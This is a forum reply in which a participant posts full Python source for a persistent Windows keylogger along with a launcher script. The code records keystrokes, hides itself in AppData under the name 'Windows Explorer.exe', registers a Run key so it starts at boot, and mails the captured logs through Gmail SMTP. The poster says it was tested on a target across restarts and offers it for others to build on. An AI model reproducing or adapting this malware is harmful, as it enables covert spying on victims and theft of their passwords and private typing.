October 22, 2019 at 8:53 pm #26237
AJ
Participant

Hi Alison,

I am sorry for the late reply. I actually managed to reproduce the same keylogger with persistence and it worked. Please check the following source code, and try to use it for later debugging or if you want to buildup on this:

klog_object.py 


#!/usr/bin/env python
import persistent_keylogger
my_keylogger = persistent_keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
my_keylogger.start()

Actual code of persistence_keylogger.py 


#!/usr/bin/env python
import pynput.keyboard
import threading
import smtplib
import shutil
import os
import sys
import subprocess

class Keylogger:
	def __init__(self, time_interval, email, password):
    	        self.log = "Keylogger started"
		self.become_persistent()
	        self.interval = time_interval
	        self.email = email
	        self.password = password

	def become_persistent(self):
        	evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
        	if not os.path.exists(evil_file_location):
            	    shutil.copyfile(sys.executable, evil_file_location)
		    subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)

	def append_to_log(self, string):
		self.log = self.log + string

	def process_key_press(self, key):
		try:
			current_key = str(key.char)
		except AttributeError:
			if key == key.space:
				current_key = " "
			else:
				current_key = " " + str(key) + " "
		self.append_to_log(current_key)

	def report(self):
		self.send_mail(self.email, self.password, "\n\n" + self.log)
		self.log = ""
		timer = threading.Timer(self.interval, self.report)
		timer.start()

	def send_mail(self, email, password, message):
		server = smtplib.SMTP("smtp.gmail.com", 587)
		server.starttls()
		server.login(email, password)
		server.sendmail(email, email, message)
		server.quit()

	def start(self):
		keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
		with keyboard_listener:
			self.report()
			keyboard_listener.join()

Note: Please note that I’ve changed the names of the file and tested the keylogger with my Gmail even after the target system has been restarted, but I put your name again for convenience, and that you put the correct file names for I changed them when I edited the above source code.

Please let me know how it goes. Thank you.